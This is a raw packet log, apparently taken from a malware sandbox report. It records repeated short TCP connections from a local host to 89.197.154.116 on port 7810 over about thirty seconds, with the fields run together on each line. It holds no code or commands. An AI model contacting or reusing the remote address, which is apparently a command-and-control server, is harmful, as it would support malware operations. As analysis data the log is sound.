                                          Oct 13, 2024 01:59:16.292011976 CEST78104990489.197.154.116192.168.2.4
                                          Oct 13, 2024 01:59:16.293947935 CEST499047810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:59:16.429400921 CEST78104990489.197.154.116192.168.2.4
                                          Oct 13, 2024 01:59:16.430938959 CEST499047810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:59:16.431324005 CEST499047810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:59:16.432463884 CEST499047810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:59:16.436065912 CEST78104990489.197.154.116192.168.2.4
                                          Oct 13, 2024 01:59:16.437232018 CEST78104990489.197.154.116192.168.2.4
                                          Oct 13, 2024 01:59:16.678771019 CEST78104990489.197.154.116192.168.2.4
                                          Oct 13, 2024 01:59:16.678787947 CEST78104990489.197.154.116192.168.2.4
                                          Oct 13, 2024 01:59:16.679025888 CEST499047810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:59:16.679327965 CEST499047810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:59:16.684323072 CEST78104990489.197.154.116192.168.2.4
                                          Oct 13, 2024 01:59:16.782325983 CEST499107810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:59:16.787504911 CEST78104991089.197.154.116192.168.2.4
                                          Oct 13, 2024 01:59:16.787832975 CEST499107810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:59:16.793088913 CEST499107810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:59:16.798378944 CEST78104991089.197.154.116192.168.2.4
                                          Oct 13, 2024 01:59:17.418070078 CEST78104991089.197.154.116192.168.2.4
                                          Oct 13, 2024 01:59:17.418258905 CEST499107810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:59:17.554655075 CEST78104991089.197.154.116192.168.2.4
                                          Oct 13, 2024 01:59:17.554939032 CEST499107810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:59:17.555068016 CEST499107810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:59:17.556112051 CEST499107810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:59:17.560548067 CEST78104991089.197.154.116192.168.2.4
                                          Oct 13, 2024 01:59:17.561165094 CEST78104991089.197.154.116192.168.2.4
                                          Oct 13, 2024 01:59:17.809649944 CEST78104991089.197.154.116192.168.2.4
                                          Oct 13, 2024 01:59:17.809725046 CEST78104991089.197.154.116192.168.2.4
                                          Oct 13, 2024 01:59:17.809797049 CEST78104991089.197.154.116192.168.2.4
                                          Oct 13, 2024 01:59:17.809988022 CEST499107810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:59:17.809988022 CEST499107810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:59:17.810235023 CEST499107810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:59:17.810235023 CEST499107810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:59:17.815550089 CEST78104991089.197.154.116192.168.2.4
                                          Oct 13, 2024 01:59:17.815629005 CEST499107810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:59:17.922728062 CEST499217810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:59:17.928208113 CEST78104992189.197.154.116192.168.2.4
                                          Oct 13, 2024 01:59:17.928428888 CEST499217810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:59:17.928782940 CEST499217810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:59:17.933882952 CEST78104992189.197.154.116192.168.2.4
                                          Oct 13, 2024 01:59:18.533701897 CEST78104992189.197.154.116192.168.2.4
                                          Oct 13, 2024 01:59:18.534043074 CEST499217810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:59:18.665723085 CEST78104992189.197.154.116192.168.2.4
                                          Oct 13, 2024 01:59:18.666090012 CEST499217810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:59:18.666681051 CEST499217810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:59:18.667675018 CEST499217810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:59:18.672075987 CEST78104992189.197.154.116192.168.2.4
                                          Oct 13, 2024 01:59:18.672854900 CEST78104992189.197.154.116192.168.2.4
                                          Oct 13, 2024 01:59:18.919621944 CEST78104992189.197.154.116192.168.2.4
                                          Oct 13, 2024 01:59:18.919694901 CEST78104992189.197.154.116192.168.2.4
                                          Oct 13, 2024 01:59:18.919807911 CEST499217810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:59:18.919809103 CEST499217810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:59:18.920172930 CEST499217810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:59:18.926508904 CEST78104992189.197.154.116192.168.2.4
                                          Oct 13, 2024 01:59:19.032234907 CEST499277810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:59:19.039231062 CEST78104992789.197.154.116192.168.2.4
                                          Oct 13, 2024 01:59:19.039361000 CEST499277810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:59:19.039870024 CEST499277810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:59:19.046773911 CEST78104992789.197.154.116192.168.2.4
                                          Oct 13, 2024 01:59:19.639409065 CEST78104992789.197.154.116192.168.2.4
                                          Oct 13, 2024 01:59:19.639635086 CEST499277810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:59:19.768841028 CEST78104992789.197.154.116192.168.2.4
                                          Oct 13, 2024 01:59:19.769057989 CEST499277810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:59:19.769504070 CEST499277810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:59:19.770519018 CEST499277810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:59:19.774559975 CEST78104992789.197.154.116192.168.2.4
                                          Oct 13, 2024 01:59:19.775605917 CEST78104992789.197.154.116192.168.2.4
                                          Oct 13, 2024 01:59:20.091670036 CEST78104992789.197.154.116192.168.2.4
                                          Oct 13, 2024 01:59:20.091731071 CEST78104992789.197.154.116192.168.2.4
                                          Oct 13, 2024 01:59:20.091770887 CEST78104992789.197.154.116192.168.2.4
                                          Oct 13, 2024 01:59:20.091789007 CEST499277810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:59:20.091836929 CEST499277810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:59:20.091836929 CEST499277810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:59:20.183036089 CEST499277810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:59:20.188510895 CEST78104992789.197.154.116192.168.2.4
                                          Oct 13, 2024 01:59:20.308005095 CEST499387810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:59:20.313354015 CEST78104993889.197.154.116192.168.2.4
                                          Oct 13, 2024 01:59:20.313445091 CEST499387810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:59:20.336716890 CEST499387810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:59:20.342083931 CEST78104993889.197.154.116192.168.2.4
                                          Oct 13, 2024 01:59:20.918519974 CEST78104993889.197.154.116192.168.2.4
                                          Oct 13, 2024 01:59:20.918631077 CEST499387810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:59:21.047769070 CEST78104993889.197.154.116192.168.2.4
                                          Oct 13, 2024 01:59:21.047882080 CEST499387810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:59:21.048265934 CEST499387810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:59:21.049901009 CEST499387810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:59:21.053502083 CEST78104993889.197.154.116192.168.2.4
                                          Oct 13, 2024 01:59:21.055195093 CEST78104993889.197.154.116192.168.2.4
                                          Oct 13, 2024 01:59:21.299103022 CEST78104993889.197.154.116192.168.2.4
                                          Oct 13, 2024 01:59:21.299235106 CEST499387810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:59:21.299690962 CEST78104993889.197.154.116192.168.2.4
                                          Oct 13, 2024 01:59:21.299735069 CEST78104993889.197.154.116192.168.2.4
                                          Oct 13, 2024 01:59:21.299777985 CEST499387810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:59:21.299813986 CEST499387810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:59:21.406584978 CEST497757810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:59:21.406584978 CEST497757810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:59:21.407150030 CEST499447810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:59:21.412090063 CEST78104977589.197.154.116192.168.2.4
                                          Oct 13, 2024 01:59:21.412281036 CEST497757810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:59:21.412575960 CEST78104994489.197.154.116192.168.2.4
                                          Oct 13, 2024 01:59:21.412745953 CEST499447810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:59:21.412867069 CEST499447810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:59:21.418034077 CEST78104994489.197.154.116192.168.2.4
                                          Oct 13, 2024 01:59:22.011605024 CEST78104994489.197.154.116192.168.2.4
                                          Oct 13, 2024 01:59:22.011799097 CEST499447810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:59:22.141280890 CEST78104994489.197.154.116192.168.2.4
                                          Oct 13, 2024 01:59:22.141375065 CEST499447810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:59:22.141841888 CEST499447810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:59:22.143364906 CEST499447810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:59:22.147051096 CEST78104994489.197.154.116192.168.2.4
                                          Oct 13, 2024 01:59:22.148477077 CEST78104994489.197.154.116192.168.2.4
                                          Oct 13, 2024 01:59:22.390285015 CEST78104994489.197.154.116192.168.2.4
                                          Oct 13, 2024 01:59:22.390330076 CEST78104994489.197.154.116192.168.2.4
                                          Oct 13, 2024 01:59:22.390363932 CEST499447810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:59:22.390367985 CEST78104994489.197.154.116192.168.2.4
                                          Oct 13, 2024 01:59:22.390546083 CEST499447810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:59:22.390734911 CEST499447810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:59:22.390734911 CEST499447810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:59:22.390752077 CEST499447810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:59:22.396027088 CEST78104994489.197.154.116192.168.2.4
                                          Oct 13, 2024 01:59:22.396107912 CEST499447810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:59:22.500916004 CEST499507810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:59:22.506478071 CEST78104995089.197.154.116192.168.2.4
                                          Oct 13, 2024 01:59:22.509968996 CEST499507810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:59:22.510274887 CEST499507810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:59:22.515332937 CEST78104995089.197.154.116192.168.2.4
                                          Oct 13, 2024 01:59:23.115689039 CEST78104995089.197.154.116192.168.2.4
                                          Oct 13, 2024 01:59:23.116128922 CEST499507810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:59:23.248651028 CEST78104995089.197.154.116192.168.2.4
                                          Oct 13, 2024 01:59:23.249064922 CEST499507810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:59:23.249149084 CEST499507810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:59:23.250401974 CEST499507810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:59:23.254725933 CEST78104995089.197.154.116192.168.2.4
                                          Oct 13, 2024 01:59:23.255824089 CEST78104995089.197.154.116192.168.2.4
                                          Oct 13, 2024 01:59:23.497179985 CEST78104995089.197.154.116192.168.2.4
                                          Oct 13, 2024 01:59:23.497226954 CEST78104995089.197.154.116192.168.2.4
                                          Oct 13, 2024 01:59:23.497507095 CEST499507810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:59:23.497507095 CEST499507810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:59:23.497998953 CEST499507810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:59:23.503042936 CEST78104995089.197.154.116192.168.2.4
                                          Oct 13, 2024 01:59:23.609960079 CEST499617810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:59:23.615766048 CEST78104996189.197.154.116192.168.2.4
                                          Oct 13, 2024 01:59:23.615871906 CEST499617810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:59:23.616173983 CEST499617810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:59:23.621429920 CEST78104996189.197.154.116192.168.2.4
                                          Oct 13, 2024 01:59:24.243984938 CEST78104996189.197.154.116192.168.2.4
                                          Oct 13, 2024 01:59:24.244251966 CEST499617810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:59:24.378721952 CEST78104996189.197.154.116192.168.2.4
                                          Oct 13, 2024 01:59:24.378856897 CEST499617810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:59:24.379973888 CEST499617810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:59:24.385098934 CEST78104996189.197.154.116192.168.2.4
                                          Oct 13, 2024 01:59:24.388509989 CEST499617810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:59:24.393978119 CEST78104996189.197.154.116192.168.2.4
                                          Oct 13, 2024 01:59:24.633630037 CEST78104996189.197.154.116192.168.2.4
                                          Oct 13, 2024 01:59:24.633699894 CEST78104996189.197.154.116192.168.2.4
                                          Oct 13, 2024 01:59:24.633846998 CEST499617810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:59:24.633847952 CEST499617810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:59:24.634196043 CEST499617810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:59:24.639133930 CEST78104996189.197.154.116192.168.2.4
                                          Oct 13, 2024 01:59:24.750737906 CEST499677810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:59:24.756288052 CEST78104996789.197.154.116192.168.2.4
                                          Oct 13, 2024 01:59:24.756479979 CEST499677810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:59:24.757349968 CEST499677810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:59:24.762629986 CEST78104996789.197.154.116192.168.2.4
                                          Oct 13, 2024 01:59:25.365113020 CEST78104996789.197.154.116192.168.2.4
                                          Oct 13, 2024 01:59:25.365276098 CEST499677810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:59:25.640459061 CEST78104996789.197.154.116192.168.2.4
                                          Oct 13, 2024 01:59:25.640839100 CEST499677810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:59:25.642395973 CEST499677810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:59:25.643353939 CEST499677810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:59:25.650434017 CEST78104996789.197.154.116192.168.2.4
                                          Oct 13, 2024 01:59:25.650474072 CEST78104996789.197.154.116192.168.2.4
                                          Oct 13, 2024 01:59:25.821888924 CEST78104996789.197.154.116192.168.2.4
                                          Oct 13, 2024 01:59:25.821938992 CEST78104996789.197.154.116192.168.2.4
                                          Oct 13, 2024 01:59:25.822043896 CEST499677810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:59:25.822484016 CEST499677810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:59:25.827760935 CEST78104996789.197.154.116192.168.2.4
                                          Oct 13, 2024 01:59:25.940555096 CEST499787810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:59:25.946109056 CEST78104997889.197.154.116192.168.2.4
                                          Oct 13, 2024 01:59:25.946247101 CEST499787810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:59:25.946491003 CEST499787810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:59:25.951941013 CEST78104997889.197.154.116192.168.2.4
                                          Oct 13, 2024 01:59:26.549297094 CEST78104997889.197.154.116192.168.2.4
                                          Oct 13, 2024 01:59:26.549496889 CEST499787810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:59:26.682214022 CEST78104997889.197.154.116192.168.2.4
                                          Oct 13, 2024 01:59:26.682312012 CEST499787810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:59:26.682770967 CEST499787810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:59:26.687869072 CEST78104997889.197.154.116192.168.2.4
                                          Oct 13, 2024 01:59:27.949930906 CEST499787810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:59:27.954955101 CEST78104997889.197.154.116192.168.2.4
                                          Oct 13, 2024 01:59:28.129292965 CEST78104997889.197.154.116192.168.2.4
                                          Oct 13, 2024 01:59:28.129342079 CEST78104997889.197.154.116192.168.2.4
                                          Oct 13, 2024 01:59:28.129379034 CEST499787810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:59:28.129437923 CEST499787810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:59:28.129841089 CEST499787810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:59:28.134608030 CEST78104997889.197.154.116192.168.2.4
                                          Oct 13, 2024 01:59:28.239988089 CEST499907810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:59:28.245007038 CEST78104999089.197.154.116192.168.2.4
                                          Oct 13, 2024 01:59:28.245181084 CEST499907810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:59:28.245359898 CEST499907810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:59:28.250220060 CEST78104999089.197.154.116192.168.2.4
                                          Oct 13, 2024 01:59:28.866328001 CEST78104999089.197.154.116192.168.2.4
                                          Oct 13, 2024 01:59:28.866436958 CEST499907810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:59:29.004575968 CEST78104999089.197.154.116192.168.2.4
                                          Oct 13, 2024 01:59:29.004806042 CEST499907810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:59:29.005140066 CEST499907810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:59:29.010000944 CEST78104999089.197.154.116192.168.2.4
                                          Oct 13, 2024 01:59:30.259061098 CEST499907810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:59:30.264229059 CEST78104999089.197.154.116192.168.2.4
                                          Oct 13, 2024 01:59:30.437318087 CEST78104999089.197.154.116192.168.2.4
                                          Oct 13, 2024 01:59:30.437449932 CEST78104999089.197.154.116192.168.2.4
                                          Oct 13, 2024 01:59:30.437474966 CEST499907810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:59:30.437545061 CEST499907810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:59:30.437560081 CEST78104999089.197.154.116192.168.2.4
                                          Oct 13, 2024 01:59:30.437983036 CEST499907810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:59:30.438070059 CEST499907810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:59:30.442763090 CEST78104999089.197.154.116192.168.2.4
                                          Oct 13, 2024 01:59:30.442872047 CEST499907810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:59:30.553922892 CEST500077810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:59:30.558857918 CEST78105000789.197.154.116192.168.2.4
                                          Oct 13, 2024 01:59:30.558969975 CEST500077810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:59:30.565968037 CEST500077810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:59:30.570830107 CEST78105000789.197.154.116192.168.2.4
                                          Oct 13, 2024 01:59:31.157322884 CEST78105000789.197.154.116192.168.2.4
                                          Oct 13, 2024 01:59:31.157475948 CEST500077810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:59:31.288183928 CEST78105000789.197.154.116192.168.2.4
                                          Oct 13, 2024 01:59:31.288434029 CEST500077810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:59:31.305243015 CEST500077810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:59:31.310018063 CEST78105000789.197.154.116192.168.2.4
                                          Oct 13, 2024 01:59:32.918864012 CEST500077810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:59:32.923751116 CEST78105000789.197.154.116192.168.2.4
                                          Oct 13, 2024 01:59:33.094433069 CEST78105000789.197.154.116192.168.2.4
                                          Oct 13, 2024 01:59:33.094496965 CEST500077810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:59:33.095293999 CEST78105000789.197.154.116192.168.2.4
                                          Oct 13, 2024 01:59:33.095350027 CEST500077810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:59:33.095396996 CEST78105000789.197.154.116192.168.2.4
                                          Oct 13, 2024 01:59:33.095451117 CEST500077810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:59:33.205130100 CEST499387810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:59:33.205171108 CEST499387810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:59:33.205617905 CEST500297810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:59:33.210114002 CEST78104993889.197.154.116192.168.2.4
                                          Oct 13, 2024 01:59:33.210163116 CEST499387810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:59:33.210431099 CEST78105002989.197.154.116192.168.2.4
                                          Oct 13, 2024 01:59:33.210489988 CEST500297810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:59:33.210699081 CEST500297810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:59:33.215450048 CEST78105002989.197.154.116192.168.2.4
                                          Oct 13, 2024 01:59:33.819205046 CEST78105002989.197.154.116192.168.2.4
                                          Oct 13, 2024 01:59:33.819291115 CEST500297810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:59:33.951658010 CEST78105002989.197.154.116192.168.2.4
                                          Oct 13, 2024 01:59:33.952394009 CEST500297810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:59:33.957834959 CEST500297810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:59:33.963021994 CEST78105002989.197.154.116192.168.2.4
                                          Oct 13, 2024 01:59:35.497353077 CEST500297810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:59:35.502636909 CEST78105002989.197.154.116192.168.2.4
                                          Oct 13, 2024 01:59:35.675493002 CEST78105002989.197.154.116192.168.2.4
                                          Oct 13, 2024 01:59:35.675538063 CEST78105002989.197.154.116192.168.2.4
                                          Oct 13, 2024 01:59:35.675596952 CEST78105002989.197.154.116192.168.2.4
                                          Oct 13, 2024 01:59:35.675628901 CEST500297810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:59:35.675898075 CEST500297810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:59:35.675931931 CEST500297810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:59:35.676007032 CEST500297810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:59:35.681308985 CEST78105002989.197.154.116192.168.2.4
                                          Oct 13, 2024 01:59:35.681386948 CEST500297810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:59:35.784035921 CEST500467810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:59:35.789530993 CEST78105004689.197.154.116192.168.2.4
                                          Oct 13, 2024 01:59:35.789710999 CEST500467810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:59:35.790164948 CEST500467810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:59:35.795783043 CEST78105004689.197.154.116192.168.2.4
                                          Oct 13, 2024 01:59:36.412400961 CEST78105004689.197.154.116192.168.2.4
                                          Oct 13, 2024 01:59:36.412561893 CEST500467810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:59:36.548876047 CEST78105004689.197.154.116192.168.2.4
                                          Oct 13, 2024 01:59:36.548980951 CEST500467810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:59:36.549756050 CEST500467810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:59:36.554609060 CEST78105004689.197.154.116192.168.2.4
                                          Oct 13, 2024 01:59:37.866157055 CEST500467810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:59:37.871536016 CEST78105004689.197.154.116192.168.2.4
                                          Oct 13, 2024 01:59:38.046036005 CEST78105004689.197.154.116192.168.2.4
                                          Oct 13, 2024 01:59:38.046080112 CEST78105004689.197.154.116192.168.2.4
                                          Oct 13, 2024 01:59:38.046113014 CEST78105004689.197.154.116192.168.2.4
                                          Oct 13, 2024 01:59:38.046178102 CEST500467810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:59:38.046178102 CEST500467810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:59:38.046492100 CEST500467810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:59:38.046492100 CEST500467810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:59:38.051311970 CEST78105004689.197.154.116192.168.2.4
                                          Oct 13, 2024 01:59:38.051516056 CEST500467810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:59:38.159288883 CEST500637810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:59:38.164320946 CEST78105006389.197.154.116192.168.2.4
                                          Oct 13, 2024 01:59:38.164419889 CEST500637810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:59:38.164772987 CEST500637810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:59:38.169713020 CEST78105006389.197.154.116192.168.2.4
                                          Oct 13, 2024 01:59:38.765939951 CEST78105006389.197.154.116192.168.2.4
                                          Oct 13, 2024 01:59:38.766031981 CEST500637810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:59:38.896791935 CEST78105006389.197.154.116192.168.2.4
                                          Oct 13, 2024 01:59:38.896869898 CEST500637810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:59:38.897239923 CEST500637810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:59:38.902112007 CEST78105006389.197.154.116192.168.2.4
                                          Oct 13, 2024 01:59:40.234888077 CEST500637810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:59:40.240562916 CEST78105006389.197.154.116192.168.2.4
                                          Oct 13, 2024 01:59:40.410818100 CEST78105006389.197.154.116192.168.2.4
                                          Oct 13, 2024 01:59:40.410888910 CEST78105006389.197.154.116192.168.2.4
                                          Oct 13, 2024 01:59:40.410922050 CEST78105006389.197.154.116192.168.2.4
                                          Oct 13, 2024 01:59:40.411089897 CEST500637810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:59:40.411336899 CEST500637810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:59:40.411336899 CEST500637810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:59:40.416559935 CEST78105006389.197.154.116192.168.2.4
                                          Oct 13, 2024 01:59:40.416773081 CEST500637810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:59:40.529767036 CEST500807810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:59:40.535263062 CEST78105008089.197.154.116192.168.2.4
                                          Oct 13, 2024 01:59:40.535398006 CEST500807810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:59:40.536032915 CEST500807810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:59:40.541222095 CEST78105008089.197.154.116192.168.2.4
                                          Oct 13, 2024 01:59:41.145844936 CEST78105008089.197.154.116192.168.2.4
                                          Oct 13, 2024 01:59:41.145936012 CEST500807810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:59:41.278965950 CEST78105008089.197.154.116192.168.2.4
                                          Oct 13, 2024 01:59:41.279064894 CEST500807810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:59:41.279511929 CEST500807810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:59:41.284620047 CEST78105008089.197.154.116192.168.2.4
                                          Oct 13, 2024 01:59:42.532218933 CEST500807810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:59:42.537694931 CEST78105008089.197.154.116192.168.2.4
                                          Oct 13, 2024 01:59:42.709194899 CEST78105008089.197.154.116192.168.2.4
                                          Oct 13, 2024 01:59:42.709259987 CEST78105008089.197.154.116192.168.2.4
                                          Oct 13, 2024 01:59:42.709280014 CEST500807810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:59:42.709341049 CEST500807810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:59:42.713251114 CEST500807810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:59:42.718848944 CEST78105008089.197.154.116192.168.2.4
                                          Oct 13, 2024 01:59:42.831485987 CEST500877810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:59:42.837188959 CEST78105008789.197.154.116192.168.2.4
                                          Oct 13, 2024 01:59:42.837297916 CEST500877810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:59:42.837585926 CEST500877810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:59:42.842586040 CEST78105008789.197.154.116192.168.2.4
                                          Oct 13, 2024 01:59:43.479650974 CEST78105008789.197.154.116192.168.2.4
                                          Oct 13, 2024 01:59:43.479728937 CEST500877810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:59:43.617172003 CEST78105008789.197.154.116192.168.2.4
                                          Oct 13, 2024 01:59:43.617245913 CEST500877810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:59:43.633385897 CEST500877810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:59:43.638983965 CEST78105008789.197.154.116192.168.2.4
                                          Oct 13, 2024 01:59:44.857635975 CEST500877810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:59:44.862921000 CEST78105008789.197.154.116192.168.2.4
                                          Oct 13, 2024 01:59:45.033510923 CEST78105008789.197.154.116192.168.2.4
                                          Oct 13, 2024 01:59:45.033559084 CEST78105008789.197.154.116192.168.2.4
                                          Oct 13, 2024 01:59:45.033580065 CEST500877810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:59:45.033615112 CEST500877810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:59:45.033864021 CEST500877810192.168.2.489.197.154.116
                                          Oct 13, 2024 01:59:45.038662910 CEST78105008789.197.154.116192.168.2.4
                                          Oct 13, 2024 01:59:45.146606922 CEST500897810192.168.2.489.197.154.116
